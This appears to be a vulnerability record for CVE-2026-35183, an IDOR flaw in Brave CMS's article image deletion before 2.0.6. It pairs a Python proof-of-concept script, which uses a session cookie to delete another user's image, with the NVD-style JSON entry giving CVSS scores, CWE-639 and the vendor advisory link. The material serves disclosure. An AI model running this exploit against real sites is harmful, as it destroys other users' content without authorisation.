CVE-2026-35183

import requests # Configuration target_url = "http://target-brave-cms.com/dashboard/articles/deleteImage" attacker_session_cookie = "valid_session_cookie_here" # The filename of the image belonging to another user victim_image_filename = "victim_article_banner.jpg" # Headers headers = { "Cookie": f"session={attacker_session_cookie}", "User-Agent": "Mozilla/5.0" } # Payload data (method may vary based on implementation, assuming GET/POST param) payload = { "filename": victim_image_filename } try: # Send the malicious request response = requests.post(target_url, data=payload, headers=headers) if response.status_code == 200: print("[+] Exploit successful! Image deleted.") else: print(f"[-] Exploit failed. Status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] An error occurred: {e}")

{"cve": {"id": "CVE-2026-35183", "sourceIdentifier": "[email protected]", "published": "2026-04-06T20:16:26.727", "lastModified": "2026-04-14T15:50:08.513", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Brave CMS is an open-source CMS. Prior to 2.0.6, an Insecure Direct Object Reference (IDOR) vulnerability exists in the article image deletion feature. It is located in app/Http/Controllers/Dashboard/ArticleController.php within the deleteImage method. The endpoint accepts a filename from the URL but does not verify ownership. This allows an authenticated user with edit permissions to delete images attached to articles owned by other users. This vulnerability is fixed in 2.0.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ajax30:bravecms:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.0.6", "matchCriteriaId": "68058898-316C-481E-A190-0E50C51A015D"}]}]}], "references": [{"url": "https://github.com/Ajax30/BraveCMS-2.0/security/advisories/GHSA-cpf3-fxwg-cwr3", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}